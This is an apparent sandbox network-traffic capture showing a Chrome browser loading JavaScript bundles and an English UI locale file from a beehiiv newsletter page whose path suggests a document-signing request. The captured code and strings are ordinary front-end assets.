                                                                                                                                            2025-01-15 18:14:40 UTC1243INData Raw: 22 2c 73 3a 22 61 20 66 65 77 20 73 65 63 6f 6e 64 73 22 2c 6d 3a 22 61 20 6d 69 6e 75 74 65 22 2c 6d 6d 3a 22 25 64 20 6d 69 6e 75 74 65 73 22 2c 68 3a 22 61 6e 20 68 6f 75 72 22 2c 68 68 3a 22 25 64 20 68 6f 75 72 73 22 2c 64 3a 22 61 20 64 61 79 22 2c 64 64 3a 22 25 64 20 64 61 79 73 22 2c 4d 3a 22 61 20 6d 6f 6e 74 68 22 2c 4d 4d 3a 22 25 64 20 6d 6f 6e 74 68 73 22 2c 79 3a 22 61 20 79 65 61 72 22 2c 79 79 3a 22 25 64 20 79 65 61 72 73 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 72 2c 74 2c 69 2c 6d 29 7b 72 65 74 75 72 6e 20 65 2e 66 72 6f 6d 54 6f 42 61 73 65 28 72 2c 74 2c 69 2c 6d 29 7d 75 2e 65 6e 2e 72 65 6c 61 74 69 76 65 54 69 6d 65 3d 79 2c 65 2e 66 72 6f 6d 54 6f 42 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 69 2c 6d 2c 67 29 7b 66 6f
                                                                                                                                            Data Ascii: ",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour",hh:"%d hours",d:"a day",dd:"%d days",M:"a month",MM:"%d months",y:"a year",yy:"%d years"};function x(r,t,i,m){return e.fromToBase(r,t,i,m)}u.en.relativeTime=y,e.fromToBase=function(r,t,i,m,g){fo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            144192.168.2.1649871104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC557OUTGET /assets/HeroChatIcon-DZxH_rr3.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:40 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:40 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1830
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"726-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c3fb741839-EWR
                                                                                                                                            2025-01-15 18:14:40 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 32 38 34 32 62 35 30 31 2d 36 66 36 64 2d 35 31 38 30 2d 62 63 36 36 2d 66 65 62 33 61 37 30 62 31 64 32 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2842b501-6f6d-5180-bc66-feb3a70b1d2e")}catch(
                                                                                                                                            2025-01-15 18:14:40 UTC1362INData Raw: 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 31 2e 35 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 73 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 6f 7d 2c 6e 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 6f 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65
                                                                                                                                            Data Ascii: ign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:s,"aria-labelledby":o},n),r?e.createElement("title",{id:o},r):null,e.createElement("path",{strokeLine


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            145192.168.2.1649872104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:40 UTC561OUTGET /assets/FreeGatedContent-D-EWr0IZ.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:40 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:40 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2472
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960862&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=pXTAyO%2FxX3TP6%2BPWVwHKpTrIIdfJODxqTOmPASjkkkE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960862&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=pXTAyO%2FxX3TP6%2BPWVwHKpTrIIdfJODxqTOmPASjkkkE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"9a8-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c52d120f4f-EWR
                                                                                                                                            2025-01-15 18:14:40 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 66 32 35 32 34 35 63 2d 37 36 64 63 2d 35 31 31 31 2d 62 38 62 36 2d 32 32 63 31 66 64 61 36 34 37 34 38 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0f25245c-76dc-5111-b8b6-22c1fda64748")}catch(
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 66 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 79 7d 66 72 6f 6d 22 2e 2f 4c 6f 63 6b 43 6c 6f 73 65 64 49 63 6f 6e 2d 42 6c 75 6f 43 55 4d 49 2e 6a 73 22 3b 63 6f 6e 73 74 20 76 3d 28 7b 74 69 74 6c 65 3a 6c 2c 6d 65 73 73 61 67 65 3a 63 2c 63 74 61 3a 69 2c 70 75 62 6c 69 63 61 74 69 6f 6e 3a 61 2c 74 68 65 6d 65 3a 65 2c 63 72 65 61 74 65 41 63 74 69 6f 6e 54 79 70 65 3a 78 3d 67 2e 47 41 54 45 44 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 73 69 67 6e 75 70 57 69 64 67 65 74 43 6f 6e 66 69 67 73 3a 62 7d 3d 70 28 22 72 6f 6f 74 22 29
                                                                                                                                            Data Ascii: }from"./components-Oj2xMfGE.js";import{u as f}from"./useTranslation-CfKJAmGY.js";import{F as y}from"./LockClosedIcon-BluoCUMI.js";const v=({title:l,message:c,cta:i,publication:a,theme:e,createActionType:x=g.GATED})=>{const{signupWidgetConfigs:b}=p("root")
                                                                                                                                            2025-01-15 18:14:40 UTC639INData Raw: 2c 63 68 69 6c 64 72 65 6e 3a 5b 72 28 22 6c 6f 67 69 6e 2e 61 6c 72 65 61 64 79 5f 61 5f 73 75 62 73 63 72 69 62 65 72 22 29 2c 73 2e 6a 73 78 73 28 6e 2c 7b 74 6f 3a 22 2f 6c 6f 67 69 6e 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 6c 2d 31 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 73 2e 6a 73 78 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 28 22 75 6e 64 65 72 6c 69 6e 65 20 75 6e 64 65 72 6c 69 6e 65 2d 6f 66 66 73 65 74 2d 31 22 2c 7b 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 22 3a 65 21 3d 3d 22 73 75 62 73 63 72 69 62 65 2d 67 61 74 65 22 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 72 28 22 73 68 61 72 65 64 2e 63 74 61 2e 73 69 67 6e 5f 69 6e 22 29 7d 29 2c 22 2e 22 5d 7d 29 5d 7d 29 2c 73 2e 6a 73 78 28 6e 2c
                                                                                                                                            Data Ascii: ,children:[r("login.already_a_subscriber"),s.jsxs(n,{to:"/login",className:"ml-1",children:[s.jsx("span",{className:o("underline underline-offset-1",{"text-wt-text-on-background":e!=="subscribe-gate"}),children:r("shared.cta.sign_in")}),"."]})]}),s.jsx(n,


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            146192.168.2.1649874104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:40 UTC1089OUTGET /locales/en/common.json HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            baggage: sentry-environment=production,sentry-release=d18fcc64fff496fe61074277a1e9498c7d08bcd7,sentry-public_key=35c3cc890abe9dbb51e6e513fcd6bbca,sentry-trace_id=695ffbb837464cf4a120b62a556def38,sentry-sample_rate=0,sentry-sampled=false
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sentry-trace: 695ffbb837464cf4a120b62a556def38-8000873273a0c35d-0
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:40 UTC890INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:40 GMT
                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                            Content-Length: 21786
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736964880&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=%2Fph6U93D3lYVQ8H4M21jmIOjnK6xlMv%2Ffb1XNCE0Mig%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736964880&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=%2Fph6U93D3lYVQ8H4M21jmIOjnK6xlMv%2Ffb1XNCE0Mig%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:28:56 GMT
                                                                                                                                            Etag: W/"551a-193f9800140"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c6f8c3c40c-EWR
                                                                                                                                            2025-01-15 18:14:40 UTC479INData Raw: 7b 0a 20 20 22 61 64 6d 69 6e 22 3a 20 7b 0a 20 20 20 20 22 6d 6f 64 61 6c 22 3a 20 7b 0a 20 20 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 59 6f 75 27 72 65 20 6c 6f 67 67 65 64 20 69 6e 20 61 73 20 61 6e 20 61 64 6d 69 6e 22 2c 0a 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 41 74 20 74 68 69 73 20 74 69 6d 65 2c 20 61 64 6d 69 6e 20 66 75 6e 63 74 69 6f 6e 73 20 61 72 65 20 6c 69 6d 69 74 65 64 20 74 6f 3a 20 43 6f 6d 6d 65 6e 74 69 6e 67 20 6f 6e 20 70 6f 73 74 73 2c 20 44 65 6c 65 74 69 6e 67 20 63 6f 6d 6d 65 6e 74 73 20 6f 6e 20 70 6f 73 74 73 2e 22 0a 20 20 20 20 7d 0a 20 20 7d 2c 0a 20 20 22 63 6f 6d 6d 65 6e 74 73 22 3a 20 7b 0a 20 20 20 20 22 68 65 61 64 65 72 22 3a 20 22 4a 6f 69 6e 20 74 68 65 20 63 6f 6e 76 65 72 73 61 74
                                                                                                                                            Data Ascii: { "admin": { "modal": { "title": "You're logged in as an admin", "description": "At this time, admin functions are limited to: Commenting on posts, Deleting comments on posts." } }, "comments": { "header": "Join the conversat
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 6c 6f 61 64 69 6e 67 22 3a 20 22 4c 6f 61 64 69 6e 67 22 2c 0a 20 20 20 20 20 20 22 6c 6f 61 64 5f 6d 6f 72 65 22 3a 20 22 4c 6f 61 64 20 6d 6f 72 65 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 72 65 70 6f 72 74 69 6e 67 22 3a 20 7b 0a 20 20 20 20 20 20 22 72 65 70 6f 72 74 22 3a 20 22 52 65 70 6f 72 74 22 2c 0a 20 20 20 20 20 20 22 72 65 70 6f 72 74 69 6e 67 22 3a 20 22 52 65 70 6f 72 74 69 6e 67 22 2c 0a 20 20 20 20 20 20 22 72 65 70 6f 72 74 65 64 22 3a 20 22 52 65 70 6f 72 74 65 64 22 2c 0a 20 20 20 20 20 20 22 72 65 70 6f 72 74 5f 61 63 74 69 6f 6e 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 20 22 41 64 64 20 61 20 6e 6f 74 65 20 66 6f 72 20 74 68 65 20 6d 6f 64 65 72 61 74 6f 72 22 2c 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 72 65 70 6f 72 74 22 3a 20 22
                                                                                                                                            Data Ascii: loading": "Loading", "load_more": "Load more" }, "reporting": { "report": "Report", "reporting": "Reporting", "reported": "Reported", "report_action_placeholder": "Add a note for the moderator", "file_report": "
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 3a 20 7b 0a 20 20 20 20 20 20 22 72 65 70 6c 79 22 3a 20 22 52 65 70 6c 79 22 2c 0a 20 20 20 20 20 20 22 72 65 70 6c 79 69 6e 67 22 3a 20 22 52 65 70 6c 79 69 6e 67 22 2c 0a 20 20 20 20 20 20 22 72 65 70 6c 79 69 6e 67 5f 74 6f 22 3a 20 22 52 65 70 6c 79 69 6e 67 20 74 6f 22 2c 0a 20 20 20 20 20 20 22 63 61 6e 63 65 6c 5f 72 65 70 6c 79 22 3a 20 22 43 61 6e 63 65 6c 20 72 65 70 6c 79 22 0a 20 20 20 20 7d 0a 20 20 7d 2c 0a 20 20 22 61 75 74 68 6f 72 22 3a 20 7b 0a 20 20 20 20 22 62 79 6c 69 6e 65 22 3a 20 22 57 72 69 74 74 65 6e 20 42 79 22 2c 0a 20 20 20 20 22 61 75 74 68 6f 72 22 3a 20 22 41 75 74 68 6f 72 22 2c 0a 20 20 20 20 22 61 75 74 68 6f 72 73 22 3a 20 22 41 75 74 68 6f 72 73 22 2c 0a 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d
                                                                                                                                            Data Ascii: : { "reply": "Reply", "replying": "Replying", "replying_to": "Replying to", "cancel_reply": "Cancel reply" } }, "author": { "byline": "Written By", "author": "Author", "authors": "Authors", "description": "M
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 20 20 20 7d 2c 0a 20 20 20 20 22 6f 6f 70 73 22 3a 20 22 4f 6f 70 73 21 22 2c 0a 20 20 20 20 22 72 65 66 65 72 72 61 6c 73 22 3a 20 22 54 68 65 72 65 20 77 61 73 20 61 6e 20 65 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 79 6f 75 72 20 72 65 66 65 72 72 61 6c 73 2e 22 2c 0a 20 20 20 20 22 74 72 79 5f 61 67 61 69 6e 22 3a 20 22 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 2e 22 2c 0a 20 20 20 20 22 74 72 79 5f 6c 61 74 65 72 22 3a 20 22 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 22 0a 20 20 7d 2c 0a 20 20 22 66 65 65 64 62 61 63 6b 22 3a 20 7b 0a 20 20 20 20 22 61 64 64 69 74 69 6f 6e 61 6c 22 3a 20 22 41 64 64 69 74 69 6f 6e 61 6c 20 46 65 65 64 62 61 63 6b 22 2c 0a 20 20 20 20 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 20 22 45 6c
                                                                                                                                            Data Ascii: }, "oops": "Oops!", "referrals": "There was an error loading your referrals.", "try_again": "Please try again.", "try_later": "Please try again later." }, "feedback": { "additional": "Additional Feedback", "placeholder": "El
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 20 7d 2c 0a 20 20 20 20 22 70 72 65 76 69 65 77 5f 62 61 6e 6e 65 72 22 3a 20 22 50 72 65 76 69 65 77 20 4d 6f 64 65 3a 20 4e 6f 20 61 6e 73 77 65 72 73 20 77 69 6c 6c 20 62 65 20 73 61 76 65 64 2e 22 2c 0a 20 20 20 20 22 73 75 62 73 63 72 69 62 65 72 73 5f 6f 6e 6c 79 22 3a 20 22 54 68 69 73 20 66 6f 72 6d 20 69 73 20 66 6f 72 20 73 75 62 73 63 72 69 62 65 72 73 20 6f 6e 6c 79 2e 22 2c 0a 20 20 20 20 22 73 75 62 73 63 72 69 62 65 72 73 5f 6f 6e 6c 79 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 49 66 20 79 6f 75 20 61 72 65 20 61 6c 72 65 61 64 79 20 73 75 62 73 63 72 69 62 65 64 2c 20 70 6c 65 61 73 65 20 73 74 69 6c 6c 20 73 75 62 6d 69 74 20 79 6f 75 72 20 65 6d 61 69 6c 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2c 20 77 65 20 77 69 6c 6c 20 6b 6e 6f 77
                                                                                                                                            Data Ascii: }, "preview_banner": "Preview Mode: No answers will be saved.", "subscribers_only": "This form is for subscribers only.", "subscribers_only_description": "If you are already subscribed, please still submit your email to continue, we will know
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 6e 75 65 20 74 6f 22 2c 0a 20 20 20 20 22 73 65 6e 64 5f 6d 61 67 69 63 5f 6c 69 6e 6b 22 3a 20 22 53 65 6e 64 20 6d 65 20 61 20 6c 69 6e 6b 22 2c 0a 20 20 20 20 22 6d 61 67 69 63 5f 6c 69 6e 6b 5f 73 65 6e 64 69 6e 67 22 3a 20 22 53 65 6e 64 69 6e 67 2e 2e 2e 22 2c 0a 20 20 20 20 22 65 6d 61 69 6c 5f 6c 61 62 65 6c 22 3a 20 22 45 6d 61 69 6c 22 2c 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 5f 6c 61 62 65 6c 22 3a 20 22 50 61 73 73 77 6f 72 64 22 2c 0a 20 20 20 20 22 63 6f 6e 66 69 72 6d 5f 70 61 73 73 77 6f 72 64 5f 6c 61 62 65 6c 22 3a 20 22 43 6f 6e 66 69 72 6d 20 70 61 73 73 77 6f 72 64 22 2c 0a 20 20 20 20 22 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 5f 6c 61 62 65 6c 22 3a 20 22 4c 6f 67 20 69 6e 22 2c 0a 20 20 20 20 22 73 65 6e 64 5f 6d 61 67 69 63 5f 6c
                                                                                                                                            Data Ascii: nue to", "send_magic_link": "Send me a link", "magic_link_sending": "Sending...", "email_label": "Email", "password_label": "Password", "confirm_password_label": "Confirm password", "login_button_label": "Log in", "send_magic_l
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 6e 20 72 65 67 61 72 64 69 6e 67 20 79 6f 75 72 20 73 75 62 73 63 72 69 70 74 69 6f 6e 2e 22 2c 0a 20 20 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 75 62 73 63 72 69 70 74 69 6f 6e 20 53 74 61 74 75 73 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 7b 0a 20 20 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 43 68 61 6e 67 65 20 50 61 73 73 77 6f 72 64 22 2c 0a 20 20 20 20 20 20 22 73 65 74 5f 74 69 74 6c 65 22 3a 20 22 53 65 74 20 75 70 20 50 61 73 73 77 6f 72 64 22 2c 0a 20 20 20 20 20 20 22 73 65 74 5f 73 75 62 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 61 72 65 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 69 6e 67 20 69 6e 20 76 69 61 20 65 6d 61 69 6c 2e 20 54 6f 20 6c 6f 67 20 69 6e 20 77 69 74 68 20 61 20 70 61 73 73 77 6f 72
                                                                                                                                            Data Ascii: n regarding your subscription.", "status": "Subscription Status" }, "password": { "title": "Change Password", "set_title": "Set up Password", "set_subtitle": "You are currently logging in via email. To log in with a passwor
                                                                                                                                            2025-01-15 18:14:40 UTC1369INData Raw: 0a 20 20 20 20 20 20 22 74 6f 61 73 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 22 24 74 28 74 6f 61 73 74 2e 73 75 63 63 65 73 73 29 22 2c 0a 20 20 20 20 20 20 20 20 22 65 72 72 6f 72 22 3a 20 22 24 74 28 65 72 72 6f 72 73 2e 64 65 66 61 75 6c 74 29 22 2c 0a 20 20 20 20 20 20 20 20 22 65 72 72 6f 72 5f 69 6e 76 61 6c 69 64 5f 65 6d 61 69 6c 22 3a 20 22 50 6c 65 61 73 65 20 65 6e 74 65 72 20 61 20 76 61 6c 69 64 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 22 65 72 72 6f 72 5f 65 6d 61 69 6c 5f 65 78 69 73 74 73 22 3a 20 22 55 6e 61 62 6c 65 20 74 6f 20 70 72 6f 63 65 73 73 20 79 6f 75 72 20 63 68 61 6e 67 65 20 72 65 71 75 65 73 74 22 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 2c 0a
                                                                                                                                            Data Ascii: "toast": { "success": "$t(toast.success)", "error": "$t(errors.default)", "error_invalid_email": "Please enter a valid email address", "error_email_exists": "Unable to process your change request" } } },
